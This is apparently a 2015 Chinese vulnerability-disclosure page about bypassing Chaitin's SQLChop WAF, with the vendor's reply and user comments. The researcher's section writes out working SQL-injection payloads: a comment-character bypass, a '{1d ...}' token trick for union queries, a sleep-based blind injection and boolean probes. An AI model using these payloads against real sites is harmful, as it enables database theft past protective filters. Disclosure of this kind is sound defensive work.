漏洞概要
关注数(24)
关注此漏洞
漏洞标题:长亭科技sqlchop bypass
提交时间:2015-07-14 12:17
修复时间:2015-07-14 12:53
公开时间:2015-07-14 12:53
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经修复
Tags标签:
无
漏洞详情
披露状态:
2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-14: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
T_T
详细说明:
First:
对#的处理问题:
因为#是注释符,在语法分析中对此符号没有做好处理导致可被绕过。
例如提交即可绕过:
test%23aaa' union select user(),2;
只要我们在字符串中包含#这个字符就可以导致waf失效!这是非常严重的。。。
Second:
直接select{x user}from{x admin}这样是不行的
但是fuzz了一下:
这样可以绕过:select{x user}from{1d admin}
union:
union select (select{x user}from{1d admin}+limit+1),1
盲注:
1' and if(ascii(substr((select{1d user()}),1,1))>11,sleep(1),1)
同理报错注入也是可以的!
关键点在1d这个地方!同样一点错误导致waf完全被绕过!
注入的判断:
and--!!!1=- -!!!1
and--!!!1=- -!!!0
or:
%26%261=1
%26%261=0
||1=1
还有些数据库特性:
1):iis在asp程序处理中对于%的处理
2):iis在aspx程序处理中对于%u00的处理
3):select 1,2,3,4 from dual where id =1[]union[]select[]1,2,3,4 from[]
一些小问题,感觉这样防御有点暴力:
漏洞证明:
修复方案:
版权声明:转载请注明来源 izy@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-07-14 12:48
厂商回复:
非常感谢乌云的报告。在收到报告后我们技术人员进行了分析,如下:
使用语句test%23aaa' union select user(),2; 进行测试的时候显示Blocked。为了严谨,仔细核查日志,发现日志中语句test%23aaa' union select user(),2; 的所有测试也都是被拦截的。不知道是不是白帽子在测试的时候是不是因为网络导致显示的还是前一条的结果。为了避免再次让测试者误解,前端方面我们也会再努力去进行调整。
关于1d的问题,词法分析实现时考虑了oracle db下对浮点数的处理,将1d处理为数字,于是我们在后端对1d进行了特殊处理以至于出现这种bug。除白帽子报告的1d以外,还有1f也有这个问题。在下一版本中我们会进行一些完善。
由于考虑到union注入可能导致非常严重的后果,于是之前的实现中对这部分做了严格的处理。关于uddddnion dd误报的问题在下一版本中会综合实际情况考虑进行一些调整。
再次感谢白帽子报告问题。
最新状态:
2015-07-14:现在公开供大家学习,下一版本中统一修复。
漏洞评价:
评论
-
2015-07-14 10:15 |
erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)
-
2015-07-14 10:18 |
flsf ( 路人 | Rank:4 漏洞数:2 | 没事儿,小钱儿)
-
2015-07-14 11:06 |
玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )
-
2015-07-14 11:07 |
小博博 ( 实习白帽子 | Rank:60 漏洞数:9 | .)
-
2015-07-14 11:08 |
小胖子 
( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)
说好了永别了SQL注入呢?攻陷长亭,活捉肉肉!!!!
-
2015-07-14 11:08 |
淡漠天空 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
-
2015-07-14 11:09 |
yunxu ( 路人 | Rank:26 漏洞数:5 | 呵呵哒)
-
2015-07-14 11:09 |
孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)
-
2015-07-14 11:10 |
JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)
说好了永别了SQL注入呢?攻陷长亭,活捉肉肉!!!!
-
2015-07-14 11:10 |
mtfly ( 路人 | Rank:26 漏洞数:6 | 啥都不会)
-
2015-07-14 11:17 |
prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)
-
2015-07-14 11:20 |
Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)
-
2015-07-14 11:22 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
-
2015-07-14 11:25 |
answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)
-
2015-07-14 11:28 |
iceks ( 路人 | Rank:4 漏洞数:1 | 你是我的小呀小苹果~)
-
2015-07-14 11:42 |
牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )
-
2015-07-14 11:43 |
浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)
-
2015-07-14 11:54 |
izy ( 普通白帽子 | Rank:111 漏洞数:22 | http://1zy.pw/)
@浩天 我错了.... 没想到。。。。完了。。。T_T
-
2015-07-14 12:01 |
her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)
-
关于永别了这个问题,欢迎大家先看PPT啊。看完后大家觉得有什么问题,非常欢迎来交流哦。
-
2015-07-14 13:10 |
luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)
-
2015-07-14 13:15 |
her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)
wooyun最佳厂商回复,学习了!如楼上说的小伙伴们去找阿里演讲的PPT或者视频看看,在演讲中死猫大人对"永别了"这个说法有说明的,好像不是字面理解的那样……
-
2015-07-14 13:40 |
MayIKissYou ( 普通白帽子 | Rank:195 漏洞数:33 | 勿忘初心)
-
2015-07-14 14:05 |
BraveRT ( 路人 | Rank:4 漏洞数:1 | 好!)
-
2015-07-14 15:14 |
Dark4ce ( 路人 | Rank:23 漏洞数:4 )
永远有比你牛的人,话不要说的太满,脸被打的啪啪的例子那么多,就不懂得低调些!
-
2015-07-14 15:42 |
qdq ( 路人 | Rank:2 漏洞数:1 | 有关部门)
@all 大家别上当,长亭其实是来偷payload的
-
2015-07-14 18:36 |
一个狗 ( 实习白帽子 | Rank:42 漏洞数:3 | ADoG)
关于“永别了”这个说法,我当时在阿里安全峰会有讲,意思是说只有大家都来努力提升防护技术水平,才可能把 SQ 注入防护提升到很高的水平,让 SQL 注入这种攻击的门槛和成本变得相当高,这样的话,才能在一定程度上和 SQL 注入说再见。“永别了”是一个美好的愿景,并不是说我们的 SQLChop 现在就已经完美无缺,SQLChop 也需要大家的帮助来慢慢改进。可重点是我们的确通过自己的努力,用新的思路把 SQL 注入的系统性防护水平提到了一个更高的水平,我们希望倡导的是大家努力来推进防护水平的技术进步,不然大家整天就是改来改去一些正则表达式(而且正则防护系统在理论上就是有先天缺陷的),有什么意思呢?
-
2015-07-15 10:36 |
G9sT的测试 ( 路人 | Rank:0 漏洞数:1 | 我不是roots01)
-
2015-07-15 15:05 |
zhighest ( 路人 | Rank:2 漏洞数:2 | ....)
还是360网站宝靠谱啊,一个select关键字就拦截了...
-
2015-07-16 18:07 |
xy小雨 ( 普通白帽子 | Rank:171 漏洞数:50 | 成为海贼王的男人)
-
2015-07-24 23:17 |
kris ( 路人 | Rank:22 漏洞数:3 | 我很单纯但很热情。)
-
2015-08-07 11:28 |
mantis ( 路人 | Rank:21 漏洞数:5 | 一萧一剑走江湖,千古情愁尿一壶)
